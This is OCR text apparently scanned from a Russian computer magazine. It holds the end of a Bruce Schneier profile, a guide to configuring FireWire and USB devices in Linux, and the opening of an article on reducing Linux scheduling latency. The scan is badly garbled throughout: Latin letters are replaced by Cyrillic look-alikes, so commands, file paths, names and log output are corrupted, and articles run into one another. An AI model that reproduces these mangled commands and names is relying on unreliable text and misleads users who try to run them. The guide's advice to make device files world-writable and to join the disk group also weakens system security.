бы интересно прочесть самому. Ее успех объяснялся еще и тем, что в 
ту пору подобной литературы практически не было. В первой, вводной 
части работы он прибег к приему, которым до него не пользовался еще 
никто. Первая часть («Криптографические протоколы») подавалась по 
нисходящей — от протоколов к алгоритмам, а не наоборот. Это стало 
своего рода визитной карточкой Шнайера как автора. 

В России, кстати, с «Прикладной криптографией» вышел очень 
неприятный казус — часть книги была издана под псевдонимом 
некоего Б. Анина, якобы еще и бывшего полковника КГБ. При этом 
оригинальный текст подвергся удивительным трансформациям и 
настоящим чудесам компоновки, так что вышел не просто плагиат, а 
вообще что-то мало вменяемое. Официально же «Прикладную крип- 
тографию» Шнайера выпустило издательство «Триумф» в 2002 году, 
очень серьезно поработав над переводом на русский язык. 

В тех же 90-х годах Шнайер разработал немало полезных вещей, в 
их числе алгоритмы симметричного шифрования ВІоѵѵбзЬ и ТѵѵобзЬ, 
блочный шифр МасбиНіп, потоковые шифры Неііх и РГіеІіх, генераторы 



псевдослучайных чисел Ѵаггоѵѵ и Рогіипа. Еще один алгоритм Шнайера 

— ЭоІЛаіге — даже попал в художественное произведение в роман Нила 
Стивенсона «Криптономикон», под названием РопШюх. Но, если уж гово- 
рить о художественной литературе, нельзя не сказать, что имя самого 
Шнайера упоминается в нашумевшем романе «Код да Винчи» Дена 
Брауна. 

А в 1999 году Шнайер основывает компанию Соипіеграпе I пГегпеІ; 
БесигНу, Іпс., ориентированную на предоставление услуг в сфере сете- 
вой безопасности. Благодаря ряду интересных наработок компания 
довольно быстро находит клиентов среди крупных консалтинговых фирм 
и провайдеров услуг безопасности. В 2006 году в результате сделки с 
компанией ВТ бгоир (это самый крупный в Европе и один крупнейших 
в мире провайдер в области телекоммуникаций и широкополосного 
интернета) Соипіеграпе I пГегпеІ; Бесигііу, Іпс. переименовывают в ВТ 
Соип1:еграпе. По сути ВТ бгоир купила фирму Шрайера, однако никакой 
переориентации и глобальных изменений это за собой не повлекло 

— ВТ Соипіеграпе в строю по сей день, а Шнайер занимает пост техни- 
ческого директора. 

Кроме «Прикладной криптографии» Шнайер написал еще восемь книг, 
посвященных криптографии и компьютерной безопасности. Так как его 
труды переводились на многие языки мира, часть книг издана и на 
русском, включая своеобразное продолжение «Прикладной криптог- 
рафии» — «Практическую криптографию», написанную в соавторстве 
с Нильсом Фергюсоном, а также еще один бестселлер — «Секреты и 
ложь. Безопасность данных в цифровом мире». Количество статей, 
автором которых он является, и вовсе исчисляется сотнями. Также 
Шнайера часто цитируют различные СМИ. Это неудивительно, ведь ко 
всему прочему он член совета директоров Международной ассоциа- 
ции криптологических исследований и член консультативного совета 
Информационного центра электронной приватности. 

Хобби и личная жизнь 

В свободное от посещения всевозможных криптографических конфе- 
ренций, написания алгоритмов, книг и статей время Шнайер вместе со 
своей женой Карен Купер (Кагеп Соорег) занимается ресторанной кри- 
тикой. Они публикуют обзоры в ряде газет Миннеаполиса, в том числе 
и в крупном издании 51;аг ТгіЬипе. В 2000 году Шнайер с женой были 
номинированы на литературную премию в области фантастики «Хьюго» 
в номинации «Лучшая книга о фантастике» (ВезЕ РеІаЕесІ Воок). Поводом 
послужил их совместный труд «Міпісоп 34 Везіаигапі биісіе», представ- 
ленный публике на одной из выставок и отмеченный за отличный юмор. 
Поскольку тяга к писательству в Шнайере, видимо, также неискоренима, 
как и тяга к криптографии, он ведет блог с гордым названием БсЬпеіег 
оп Бесигііу и ежемесячную электронную рассылку Сгурію-бгат. И там, и 
там он рассказывает о последних тенденциях в области компьютерной 
безопасности, а также о новостях в этой и прилегающих сферах. ЛС 
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ПОДКЛЮЧАЕМ УСТРОЙСТВА 



С ИНТЕРФЕЙСАМИ 115В И 



РІРЕѴѴІРЕ К КОМПЬЮТЕРУ 



с ос і_ших 



Какие сейчас только ІІ5В- и РігеѴѴіге-ус- 
тройства ни выпускают! Это принтеры и 
сканеры, внешние накопители и мобиль- 
ные телефоны, цифровые фото- и видеока- 
меры, мышки и клавиатуры. В комплект 
поставки, как правило, входят драйверы 
только для ѴѴІпсІошз, пользователям других 
систем, вроде Ілпих, об их работе следует 
побеспокоиться самостоятельно. 



Сказка 
о горячем 
пингвине 



ЮРИЙ «ВОЕ 

/ 2І.ОѴ.ВОІ 



В ЗАЧЕМ НУЖЕН РІКЕѴѴІКЕ 

Несмотря на то что на корпусе большинства цифровых видеокамер можно 
найти надпись вроде «115В 2.0 сотраІіЫе», для захвата компьютером 
видеопотока традиционно используется высокоскоростной интерфейс 
ІЕЕЕ 1394 (другие названия — РігеѴѴіге и і.Ыпк), поддерживающий 
горячее подключение и позволяющий соединить до 63 устройств. Кстати, 
обозначение ІЕЕЕ 1394 не несет какого-то особого смысла, да и сам он 
не содержит ничего сакрального. Просто это 1394-й по счету стандарт, 
выпущенный комитетом ІЕЕЕ. В настоящее время существует две версии 
ІЕЕЕ 1394: 

• ІЕЕЕ 1394а — первый вариант, поддерживает обмен данными со скоро- 
стью до 400 Мб/с; 

• ІЕЕЕ 13946 (РігеѴѴіге 800 и РігеѴѴігеІ 600) — более новый, поддерживает 
скорость вплоть до 1 600 Мб/с (и даже до 3200 Мб/с). 

Стандарт 115В 2.0 позволяет передавать информацию со скоростью 
480 Мб/с, то есть теоретически даже больше, чем у ІЕЕЕ 1394а, но на 
практике скоростьу РігеѴѴіге получается выше. И так как РігеѴѴіге пер- 
воначально разрабатывался в том числе и для передачи видеопотоков, 
он может передавать данные в изохронном режиме с гарантированной 
скоростью. В этом случае вся полоса отдается нуждающемуся устройству 
и подключенные девайсы не конкурируют между собой за полосу про- 



пускания, какэто происходит в 115В (особенно при каскадной установке). 
Поэтому на форумах очень часто можно встретить информацию, что 
качество видео, перегнанного через РігеѴѴіге, получается выше, чем 
полученное через 115В (только мы не беремся утверждать или опровер- 
гать этот факт). Даже если тебе больше нравится 115В 2.0, приведу еще 
один аргумент в пользу РігеѴѴіге — все программы для захвата видео 
в І_іпих работа ют только с ним. Также устройства ІЕЕЕ 1394 достаточно 
независимы. То есть фактически ничто не мешает напрямую, без исполь- 
зования ПК, подсоединить видеокамеру к внешнему жесткому диску, 
использующему РігеѴѴіге, и перегнать на него отснятый материал. 

Ріо для того чтобы переписать свежеснятые мувики на компьютер, тебе, 
естественно, понадобится наличие РігеѴѴіге. Если на материнской плате 
такого разъема нет, то необходимо докупить внешнюю РСІ-карту. Стоит 
она порядка $1 5. Крометого, понадобится шнур, причем со стороны, 
подключающейся к компьютеру, он имеет разъем с шестью контактами, а 
со стороны, подсоединяемой к видеокамере, — с четырьмя (без контактов 
питания). 

^ ПОДДЕРЖКА ІЕЕЕ 1394 В иЬШХ 

Работа по поддержке ІЕЕЕ 1394 в І_іпих ведется довольно давно, и 
сейчас можно с уверенностью сказать, что основные проблемы далеко 
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позади. Хотя, как и для других компьютерныхустройств, драйверы и 
спецификации производители тщательно скрывают, поэтому, будетли 
работать конкретное устройство, зависит от используемого в нем чипа. 
Сегодня не должно быть проблем со всеми ОНСІ-совместимыми чипами 
и сустройствами, использующими Техаз ІпвІхитепІБ РСІІ_упх/РСІІ_упх2. 




Не поддерживаются чипы 5опу, используемые в ноутбуках серии Ѵаіо 
(некоторые ноуты этой серии оснащены ОНСІ-совместимым СХЭ3222), и 
Абаріес АІС-5800. Хотя ситуация быстро меняется, поэтому для проверки 
совместимости своего устройства рекомендую посетить веб-сайт под- 
держки ІЕЕЕ 1394 в Ьтих [ ѵѵ\лл/ѵ.[іпих1394.ога 1. 

Поддержка ІЕЕЕ 1394 включена в основное ядро, начиная с версии 2.3.40, 
и сейчас реализована для всех версий ядер от2.2 до 2.6 (для 2.2 и ранних 
версий 2.4 — в виде патча). Поэтому в современных дистрибутивах нет 
необходимости в пересборке ядра. Если проблемы все же возникнут, 
часто их можно решить установкой более свежей версии библиотек 
ІіЬгаѵѵІ 394 (в ІІЬипІи пакет ІіЬгаѵѵІ 394-8) и ІіЬіесб 1 883 (пакет ІіЬіесбІ 883- 
0). Первая предоставляет прямой доступ кустройству. Вторая базируется 
на Іі Ьгаѵѵі 394 и обеспечивает стандартный интерфейс для доступа к 
потоковым данным. 

Один из вариантов иерархии драйверов на моем компьютере выглядит 
так: физическое устройство — оЬсі 1 394 — іеее 1 394 — гаѵѵ1394 — ІіЬгаѵѵІ 394 
— приложение. Приэтом іеее 1 394 является высокоуровневым драйвером, 
обеспечивающим единый интерфейс доступа. Возможнытри низкоуров- 
невых модуля, работающих непосредственно сустройством. Это оЬсі 1 394 
для чипов 1 394 Ореп Нові: Сопігоііег Іпіегіасе, драйвер аіс5800 для Асіаріес 
АІС-5800 и драйвер рсііупх для чиповТехав ІпвІтитепІБ РСІЕупх. 

Если все установлено и правильно настроено, после подключения всех 
имеющихся устройств в системе могут появиться следующие модули и 
файлы устройств: 

• гаѵѵі 394 — обеспечивает прямой РАѴѴ-доступ с возможностью управ- 
ления камерой, но в то же время его не рекомендуется использовать по 
причине возможных проблем с безопасностью. Доступ в пространстве 
пользователя, как показано выше, осуществляется через ІіЬгаѵѵІ 394. 

• ѵісіео 1 394 — основной асинхронный ОНСІ-драйвер, обеспечивает бо- 
лее производительный ЭМА-доступ, поэтому и используется для работы с 
цифровыми камерами. 



Файлы устройств РігеѴѴіге 



Поискустройств ІЕЕЕ 1394 в бтевд 
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• СІѴІ394 — осуществляет прием и передачу сигналов с цифровых виде- 
окамер (Оідііаі Ѵісіео) в виде обычных файлов, полностью инкапсулирует 
обработку йѴ поверх 1394. Ранее для работы с йѴ-камерами использовал- 
ся ѵісіео 1 394, но работа с ним могла вызвать конфликтустройств, поэтому 
его переписали, хотя, судя по последней информации (смотри вывод 
сітезд ниже), от него также отказываются. 

• еіЫ394 — позволяетсвязать компьютеры в единую сеть ІЕЕЕ 1394. Пер- 
воначально инкапсуляцию обеспечивал Еібегпеі, затем была добавлена 
поддержка ІРѵ4-оѵег-1394 (РРС-2734). 

• зЬр2 — Бегіаі Виз Ргоіосоі обеспечивает доступ к устройствам хранения 
информации. 

• атсйр — реализует поддержку протокола Аисііо & Мизіс йаіа 
Тгапзтіззіоп Ргоіосоі (в настоящее время ІЕЕЕ 1394 используется в про- 
фессиональном звуковом оборудовании). 

Итак, для работы с цифровыми ОѴ-видеокамерами нам потребуются 
модули га\л/1394 и сіѵі 394, с которыми, собственно, и работают программы, 
подобные нелинейному видеоредактору Кіпо. 

г смотрим, что в кіівіжти 

В КІІЬипІи, начиная с йарегОгаке (более ранние, каюсь, не пробовал), 
с распознаванием дополнительной платы расширения и видеокамеры у 
меня проблем не было. Но они могут возникнуть в других дистрибутивах 
(особенно старых) или с другими устройствами. Поэтому давай подробно 
разберем, как определить причину втом случае, если что-то пойдет не 
так. Проверяем, что говорят сообщения ядра по поводу инициализации 
нашего РСІ-устройства: 

$ сітезд I едгер 'о1ісі1394 | іеее1394 ' 

[ 5.920000] оЪсіІЗ 94 : Ем-ЬозЕО : ОНСІ-1394 1.0 (РСІ) : 
ІК<2=[10] ММІО= [ б(1ебе000-бсЗебе7бЕ ] Мах РаскеЕ= [2048] ІК/ 
ІТ сопЕехЕз= [8/8] 

[ 7.208000] іеее1394: НозЕ асісіесі: ІБ:ВІІ5 [0-00 : 1023 ] 
СІЛБ[00601<І0000000Ъ77] 

[ 4801.104000] іеее1394: ЫосЗе асМей: ЮгВЫЗ [0-00 : 1023] 
СЛОЮ [ 00804580Ы2с1823с1] 

[ 4801.104000] іеее1394: Ыосіе сЪапдесІ: 0-00:1023 -> 0- 
01:1023 

[ 4801.508000] іеее1394: га\ѵ1394: /сІеѵ/га\ѵ1394 сіеѵісе 
іпіЕіаІігесІ 

Подробную информацию смотрим командой: 

$ Ізрсі -ѵ 

01:08.0 РігеМіге (ІЕЕЕ 1394) : Адеге ЗузЕетз РШ23 (геѵ 
61) (ргод-іЕ 10 [ОНСІ] ) 

ЗиЪзузЕеш: Адеге ЗузЕетз ЕЮ 23 



Ріадз: Ьиз тазЕег, тесііит сіеѵзеі, ІаЕепсу 64, ІК<2 10 
Метогу аЕ ЕсіеЕеООО (32-ЬіЕ, поп-ргеЕеЕсЬаЫе) 

[зіг:е=4К] 

СараЬіІіЕіез: <аѵаі1аЫе опіу Ео гооЕ> 

Как видно, у меня установлен ОНСІ-совместимый адаптер, поэтому про- 
блем в работе быть не должно. Единственное, обрати внимание на строку 
СараЬіІіІіез, так как вместо <аѵаіІаЫе опіу Іо гооІ> можетбыть что-то вроде 
оссезз бепіесІ>. Азначит, придется разбираться с правами доступа. 
Теперь проверяем, какие модули загружены: 

$ Ізтосі I дгер 1394 
гаѵ^1394 30328 0 

ЙѴІ394 20696 0 

оЬ.сі1394 36528 1 ЙѴІ394 

іеее1394 299448 4 гаѵ*1394 , <1ѵ1394 , зЬр2 , оЬсі1394 

В этом списке обязательно должны присутствовать гаѵѵі 394 и сіѵі 394. 

В современных дистрибутивах, использующихтехнологии ибеѵ и Ьаі, 
устройства обычно подхватываются на лету. КІІЬипІи это тоже касается. 

Но если в списке этих модулей не оказалось, рекомендуется загружать их 
вручную: 

$ зисіо шосЗргоЬе Ыѵ1394 
$ зисіо шосЗргоЬе га\ѵ1394 

Или автоматически, прописав гаѵѵ1394 и сіѵі 394 в /еіс/тосіиіез. 

В КІІЬипІи модуль зЬр2 загружается по умолчанию. Если ты не соби- 
раешься подключать РігеѴѴіге-диски, то стоит отключить его загрузку, 
удалив либо закомментировав строку с зЬр2 в /еіс/тосіиіез. 

И, наконец, проверяем наличие нужных файлов устройств: 

$ зисіо Еіпсі /йеѵ /ргос -паше "*1394" 

/Ыеѵ/гаѵ7І394 

/Ыеѵ/с1ѵ1394 

/Ыеѵ/ . зЕаЕіс/сіеѵ/гаш13 94 
/сіеѵ/ . исіеѵ/патез/га’м1394 

/Ыеѵ/ .ис!еѵ/патез/гаѵ7І3 94/%2Ес1азз%2Еіеее1394_ 
ргоЕосо1%2 Егаѵ^ІЗ 94 

/Ыеѵ/ .ис!еѵ/(1Ь/%2Ес1азз%2Еіеее1394_ргоЕосо1%2Ега\л7І394 
/ргос/ігд/10/о1ісі1394 

Подключаем шнурком камеру и врубаем питание. Для проверки работы 
запускаем видеоредактор Кіпо, заходим в «Есііі -> Ргеіегепсез» и выбира- 
ем ІЕЕЕ 1 394. В АѴ/С Оеѵісе пишем /сіеѵ/сіѵі 394 или /беѵ/ гаѵѵі 394. В моем 
случае с определением первого устройства проблем не возникло, а при 
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попытке выбрать гаѵѵ1394 было выдано сообщение отом, что невозможно 
открыть файл устройства и необходимо проверить наличие геасі/ѵѵгііе 
регтіззіоп у текущего пользователя. Проверяем: 

$ 1з -аі /<іеѵ/гаѵѵ1394 /сіеѵ/сіѵ1394-0 

сгѵ7-гѵ7 1 гооЕ ѵісіео 171, 32 2006-09-16 17:50 /сіеѵ/ 

(ІѴІ394-0 

сгѵ7-гѵ7 1 гооб сіізк 171, 0 2006-09-16 17:50 /сіеѵ/ 

гаѵѵ13 94 

Как видишь, чтобы работать с этими устройствами, необходимо запускать 
Кі по от имени гооі, вроде дкзисіо кіпо, что не есть хорошо. Другой вариант 
— пользователь должен принадлежать к группе ѵісіео. Смотрим, к каким 
группам принадлежиттекущий пользователь: 

$ дгоирз 

ЬоЪег асіт ЪіаІоиЕ ссігот Гіорру аисііо сіір ѵісіео ріидсіеѵ 
Ірабтіп зсаппег абтіп 

Группа ѵісіео в списке присутствует, поэтому внесем себя любимого в 
группу сіізк. Как обычно, сделать это можно несколькими способами. Са- 
мый простой — открыть файл /еіс/дгоирз и внести пользователя в строку, 
описывающую группу сіізк: 

сіізк :х: 6 : ЬоЪег 

Все. Теперь необходимо выйти из системы и зарегистрироваться снова. 

^ НАСТРОЙКИ В СТАРЫХ ДИСТРИБУТИВАХ 

В более ранних дистрибутивах файлы устройств, возможно, придется 
создавать вручную. Напомню, что в І_іпих каждое устройство имеет 
имя и два номера: основной тащг и дополнительный тіпог. Напри- 
мер, для всех ІЕЕЕ основной номер имеет цифру 1 71 , а дополнитель- 
ный определяется назначением и характеристиками устройства. Так, 
для сіѵі 394 он имеет значение от 32 до 47, для гаѵѵ отсчет начинается 
от нуля. Например, чтобы создать псевдоустройство гаѵѵ, выполняем 
такую команду: 

$ зисіо ткпосі -т 666 /сіеѵ/гаѵѵІЗ 94 с 171 0 

Для создания псевдоустройства сіѵі 394, предназначенного для записи 
информации с первого устройства в РАЕ, вводим команду: 

$ зисіо ткпосі -т 666 /<іеѵ/сіѵ1394/0 с 171 34 

Для того чтобы эти файлы автоматически создавались при загрузке 
системы, можно использовать следующий скрипт: 




Параметры ядра для работы с 115В 



$ 51Ш0 МСЕйІТ /ЕТС/ІМІТ.О/РІРЕѴѴІРЕ 

#! /Ьіп/зіі 

ДезЬ -е /сІеѵ/га\л7І394 | | ткпосі -т 666 /сіеѵ/гаѵѵ1394 с 171 0 
ДезЬ -е /с1еѵ/с1ѵ1394 | | ткпосі -т 666 /сіеѵ/сіѵ1394 с 171 34 

Теперь сделаем его исполняемым: 

$ зисіо сЪтосІ +х /еЕс/іпіД . сі/ Гігеміге 

И, чтобы он выполнялся автоматически, создаем символическую ссылку: 

$ зисіо 1п -з /еДс/іпіі: . сі/Гігеміге /еДс/гсЗ . сі/ 

350Тігеѵ7Іге 

Для проверки работы устройств ІЕЕЕ 1394 рекомендую использовать 
утилиту дзсапбиз (дзсапЬиз.ЬегІіоз.сІе), ее можно загрузить и с пакетного 
репозитария ЕІЬипІш: 

$ зисіо арк-деД іпзЕаІІ дзсапЬиз 

Запускаем программу, набрав в терм и нал ке дзсапЬиз. В появившемся 
окне будут отображены все найденные устройства с сохранением их 
топологии подключения. Щелчок мышкой по любому из них покажет 
подробную информацию. Если выбранное устройство — видеокамера, то 
ей можно управлять прямо из окна дзсапЬиз. 

Команда зисіо ар1:-сасЬе зеагсЬ іеееі 394 покажетеще ряд интересных утилит. 
Например, с помощью согіапбег(батіеп.боихсЬатр5.пеі:/іеее1394/согіапсІег) 
можноуправлять видеокамерой, Кіпо/бѵдгаЬ копирует цифровое видео на 
жесткий диск или другой носитель, а бѵЬаскир, наоборот, позволяет сохранить 
файлы на йѴ-камеру. Утилита ІезШЬгаѵѵ, которую можно получить, установив 
пакет ІіЬгаѵѵІ 394-сІеѵ, расскажетвсео подключенныхустройствах и хостах. 

И НАСТРОЙКА ІІ5В-УСТР0ЙСТВ 

Поддержка 115В включена в ядро, начиная с версии 2.2.7, и можно 
сказать, что эта реализация уже обкатана и проблем при подключении 
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таких устройств быть не должно. Достаточно лишь подключить фото- 
камеру, флешку, принтер или любое другое устройство, и оно будетавто- 
мати чески распознано. А заработает ли, например, принтер, зависит от 
наличия драйверов. Для прояснения ситуации разберем, как реа- 
лизована поддержка 115В и где искать информацию о подключенных 
устройствах, хотя все, что сказано о РігеѴѴіге, частично касается и 115В. 

В современных компьютерах можно найти три типа контроллеров, 
отличающихся интерфейсом взаимодействия с устройствами. Это 
ОНСІ (Ореп Нобі: Сопігоііег Іпіег^асе], ІІНСІ (ІІпіѵегзаІ Нозі Сопігоііег 
Іпіегіасе) и ЕНСІ (ЕпЬапсесІ Но5І Сопіхоііег I пІегТасе) . Первые два 
реализуют поддержку 115В версии 1.1, последний — 2.0, обеспечивая 
скорость обмена до 480 Мбит/с. ІІНСІ-контроллеры несколько проще и 
дешевле, но требуют сложных драйверов и больше нагружают процес- 
сор. Узнать свой тип контроллера очень просто: 

$ Ізрсі -ѵ 

00:02.0 ІІЗВ Сопігоііег: пѴіЫіа Согрогакіоп МСР55 ИЗБ 
СопЪгоІІег (геѵ аі) (ргод-іТ 10 [ОНСІ]) 

ЗиЬзузІеш: Віозіаг Місгоіесіі ІпС'1 Согр Шкпоѵт. 
Ыеѵісе 3405 

Ріадз : Ьиз тазіег, ббМНг, Тазі сіеѵзеі, Іаіепсу 0, 
ІКО 11 

Мешогу аі: 1е02б000 (32-ЬіЬ, поп-ргеТебсЬаЫе) 
[зіге=4К] 

СараЪіІікіез : <ассезз (ІепіесІ> 

00:02.1 ІІЗВ Сопбгоііег: пѴісІіа Согрогакіоп МСР55 ІІЗВ 
Сопігоііег (геѵ а2) (ргод-іб 20 [ЕНСІ]) 

ЗиЬзузІеш: Віозкаг Місгоіесіі ІпС'1 Согр Шкпоѵт 
Ыеѵісе 3405 

Ріадз: Ьиз гпазСег, ббМНг, баз! сіеѵзеі, Іабепсу 0, 

ІКО 5 

Мешогу а к Те02е000 (32-Ьік, поп-ргеТебсЬаЫе) 
[зіге=256] 

СараЪіІібіез : <ассезз (Іепіесі> 

Как видишь, у меня имеются оба типа контроллеров: ОНСІ и ЕНСІ. Если 
ты используешь самосборное ядро, включи нужный драйвер в пункте 
115В Нозі Сопігоііег Огіѵегз. Не буду обременять тебя описаниями всех 
опций, просто скажу, что их можно посмотреть по команде дгер -і изб / 
изг/згс/ііпих/.сопбд. Также надо помнить, что работа с 115В осуществля- 
ется путем эмуляции 5С5І, поэтому следует активировать и параметры, 
относящиеся к поддержке 5С5І. 

Для непосредственной работы с ИЗВ-устройствами создается каталог 
/ргос/Ьиз/изЬ в виртуальной файловой системе /ргос, который монтиру- 
ется через /еісЛзІаЬ: 

попе /ргос/Ьиз/изЬ изЪТз поаибо 0 0 

Если такой строчки в твоем файле нет, это может означать, что 
разработчики избавили тебя от лишних забот и изЫ'з монтируется 
в стартовых скриптах. В каком конкретно скрипте это делается, ты 
узнаешь, набрав «зисіо дгер -ІР "изЫз" /еіс/*». Например, в КІІЬипіи 
за монтирование 115В отвечает скрипт/еіс/іпіі.сІ/тоипісІеѵзиЫ'з.зЬ. 
Вручную смонтировать файловую систему для 115В можно так: 

$ зисіо шоипС -к изЪсіеѵТз попе /ргос/Ьиз/изЬ 

После этого команда «тоипі | дгер изЫ'з» должна показать наличие 
строки: 

ргосЬизизЬ оп /ргос/Ьиз/изЬ Суре изЫз (г\ѵ) 

А вывод [зтосі — загруженные модули изЬсоге, оЬсі ЬссІ, еЬсі ЬссІ, 

иЬсі_Ьсз, а также модуль, соответствующий драйверу подключенного 
устройства вроде зсаппег.о, ргіпіег.о, изЬ_5І:огаде. 




Утилита изЬѵіеѵѵ 

Информацию о подключенном II 5 В -устройстве можно получить из/ѵаг/ 
Іод/сітезд и непосредственно из /ргос. Если каталог/ргос/Ьиз/изЬ пуст, 
это значит, что виртуальная файловая система 115В не смонтирована. 
Внутри каталога должно быть несколько файлов с именами вида 001 , 002 
(по количеству контроллеров) и файл сіеѵісез, который «знает» обо всех 
устройствах: 

$ саЬ /ргос/Ьиз/изЬ/(1еѵісез 

Т: Виз=02 Ьеѵ=00 РгпС=00 РогС=00 СпС=00 Беѵ# = 1 Зрсі=480 
МхСЬ=10 

В: А11ос= 0/800 из ( 0%) , #ІпС= 0, #Ізо= 0 

Б: Ѵег= 2.00 С1з=09 (ЬиЬ ) ЗиЪ=00 РгоС=01 МхР5=64 #СТдз= 1 

Р: Ѵепсіог=0000 РгосИБ^ОООО Кеѵ= 2.0 6 

3: МапиТас1:игег=Ьіпих 2 . б . 20-15-депегіс еЬ.сі_]іссІ 

3: РгосіисШЕНСІ НозС СопСгоІІег 

3: ЗегіаІЫитЬег=0000 : 00 : 02 . 1 

С:* #113= 1 С1д#= 1 АСг=е0 МхР\ѵг= ОтА 

I: І1#= 0 АІС= 0 #ЕРз= 1 С1з=09 (ЬиЬ ) ЗиЬ=00 РгоС=00 

Бгіѵег=1іиЬ 

Е: Ас1=81(І) АСг=03 ( ІпС . ) МхРЗ= 4 Іѵ1=25бшз 

Расшифровать вывод легко, подробности ищи в документации 
(/изг/згс/ОоситепІаІіоп/изЬ/ргос^зЬ-іпію.Ш]. Скажу только, что 
буква Т определяеттопологию; Виз и І_еѵ показывают, к какой шине 
подключено устройство, а также уровень в топологии; 5рсІ выдает 
скорость; МхСЬ — сколько еще устройств к нему можно подключить; 
Огіѵег — тип используемого драйвера (например, Огіѵег=ЬиЬ означа- 
ет, что это разветвитель, а 0гіѵег=изЬ-5І:огаде — 1)5В-устройство для 
хранения информации). 

В репозитарии КІІЬипІи можно найти несколько программ, кото- 
рые помогуттебе разобраться с 115В. Так, использовав утилиты 
ІзизЬ и изЬѵіеѵѵ, ты получишь еще больше информации о своих 
1)5В-девайсах. 

Вот в принципе и все, что хотелось сказать о подключении горячихуст- 
ройств к компьютеру с І_іпих. Надеюсь, теперь проблем с этим у тебя уже 
не возникнет, цц 
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ВЛАДИМИР «ТІІВВІМА» ЛЯШКО] 



Нап ерег онки 



со временем 



ипіхоій 



УМЕНЬШАЕМ ВРЕМЯ ОТКЛИКА ПРИЛОЖЕНИИ В 1_Ш1Ш 



В зависимости от частоты процессора, объема свободной оперативной памяти и скоро- 
сти работы видеоподсистемы стандартное ядро Ілпих имеет время отклика в диапазоне 
от 10 до 100 мс (ядра серии 2 . 2 * даже до 150 мс), чего вполне достаточно для обычного 
использования. Но существуют задачи, для которых такая латентность считается неве- 
роятно большой. Например, обработка звука требует задержки не более 5 мс суммарно 
для всей системы, включая реакцию периферийных устройств. Давай разбираться, как 
можно уменьшить это значение в пингвине. 



Н О ЧЕМ ЭТО МЫ? 

Работая на компьютере, нам постоянно приходится сталкиваться с 
различного рода задержками. Попробуй одновременно компилить ядро, 
слушать музыку, качать фильмы по сетке и набирать текст в ОрепСНФісе. 
огд. Я уверен, что рано или поздно ты столкнешься стем, что знаки во 
ѴѴгіІег станут появляться через пару секунд после того, какты нажмешь 
на кнопки клавиатуры, да и проигрыватель начнет постоянно заикаться. 
Как же можно уменьшить время отклика приложений в І_іп их — операци- 
онной системе разделения времени, где все процессы равны (ну почти)? 
Ведь она разрабатывалась с упором на оптимизацию системной произ- 
водительности в целом, и об обеспечении ограниченного времени ответа 
приложениям речи не шло. 

г ИСПОЛЬЗУЕМ ПОДРУЧНЫЕ СРЕДСТВА 

Как известно, жизнь системе дают процессы, которые играют ключевую 
роль в любой операционной системе. Ядро не резиновое, и, несмотря на 
заоблачные гигагерцовые частоты, в единицу времени можно выполнить 
инструкции только одного процесса (при этом время использования 
процессора называют квантом), а самих процессов в системе может быть 
очень много. Итак, чтобы уменьшить задержки, количество процессов 
необходимо свести к минимуму. Для этого нужно не только убрать все 



лишние программы и отключить все неиспользуемые демоны, но и пере- 
собрать ядро, оставив лишь действительно необходимый функционал. 
Для того чтобы культурно распределить ресурсы и никого при этом не 
обделить, в любой системе имеется своя подсистема управления процес- 
сами, работающая по принципу «каждому по способностям, каждому по 
труду». Процесс может работать в двух режимах: в режиме ядра (кегпеі 
тобе) и в пользовательском режиме (ивег тобе), где он выполняет 
простые инструкции, не требующие особых «системных» данных. Но 
когда такие услуги понадобятся, процесс перейдет в режим ядра, хотя 
инструкции по-прежнему будут выполняться от имени процесса. Все 
это сделано специально, чтобы защитить рабочее пространство ядра 
от пользовательского процесса. Остальные процессы либо готовятся к 
запуску, ожидая, когда планировщик их выберет, либо находятся в ре- 
жиме сна (азіеер), дожидаясь недоступного на данный момент времени 
ресурса. С последним все просто. Когда поступает сигнал с подконтроль- 
ного устройства, процесс объявляет себя ТА5К_НІІММІЫб и становится в 
очередь готовности кзапуску. Если он имеет высший приоритет, то ядро 
переключается на его выполнение. 

Но есть еще одна заковырка. При предоставлении процессу системных 
ресурсов происходит так называемое переключение контекста (соп(ех( 
зѵѵіісЫ, сохраняющее образ текущего процесса (на что, кстати, тоже 
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Включаем геаі-бте 



требуется какое-то время, поэтому латентность даже в идеальном случае 
не будет равна нулю). Так вот переключение контекста, когда процесс 
находится в режиме ядра, может привести к краху всей системы. Поэтому 
высокоприоритетному процессу придется терпеливо подождать момента 
перехода в режим задачи, а это может произойти в двух случаях: работа 
сделана или необходимый ресурс недоступен. То есть, чтобы обеспечить 
меньшее время отклика, необходимо свести к минимуму число ядерных 
задач. Но за такое решение приходится платить общей стабильностью 
и «тяжестью» кода. В микроядрах это, кстати, реализовано значительно 
лучше — имеется базовый минимальный набор, остальное навешивается 
модульно, как на новогоднюю елку, что обеспечиваетуниверсальность и 
позволяет конструировать системы под конкретные задачи. 

Что касается планирования процессов, то оно завязано на приоритете. 
Планировщик попросту выбирает следующий процесс, имеющий наи- 
высший приоритет. При этом менее приоритетный процесс, выполняю- 
щийся в тот момент, может даже полностью не отработать свой квант 
до конца. Каждый процесс имеет два вида приоритета: относительный 
(р->пісе, по умолчанию до 100 уровней приоритетов), устанавливаемый 
при запуске приложения, и текущий, на основании которого и происходит 
планирование. Значениетекущего приоритета не является фиксирован- 
ным, а вычисляется динамически и напрямую зависит от пісе. Значение, 
устанавливаемое пользователем, может находиться в пределах от -20 до 
+ 1 9, при этом приложению с более высоким приоритетом соответствует 
значение -20, а +1 0 (по умолчанию) и выше считаются уже низкоприори- 
тетными задачами. Например, для запуска программы с более высоким, 
чем обычно, приоритетом, делаем так: 



$ зисіо пісе --2 0 шріауег 



А с более низким: 



$ зисіо пісе -2 0 зоЬ & 

Чтобы изменить относительный приоритет процесса, следует использо- 
вать идентификатор процесса, а не название: 



Планировщики ввода/вывода 



простейшем случае приоритет просто делится на 2 и при достижении 
нулевого значения полностью пересчитывается заново (восстанавлива- 
ется). Такой механизм позволяет получить свое время и низкоприоритет- 
ным приложениям, но в итоге высокоприоритетные получают большую 
его часть. 

Каждый компьютер имеет системные часы, которые генерируют 
аппаратное прерывание через определенные промежутки времени. 
Интервал между этими прерываниями называется тиком (сіоскііск). В 
различных операционных системахтик имеетсвое значение. В Ьі п их, 
как и в большинстве никсов, он составляет 1 0 мс. Значение можно 
подсмотреть в файле заголовков іпсІисІе/Ііпих/рагат.Ь, в константе Н2. 
Для тика 1 0 мс значение Н2 равно 1 00. Чем эта цифра больше, тем чаще 
тикает планировщик. Тик — одна из высокоприоритетных задач, которая 
должна занимать минимум времени. За время тика происходит просмотр 
статистики использования процессора, перепланирование процессов, 
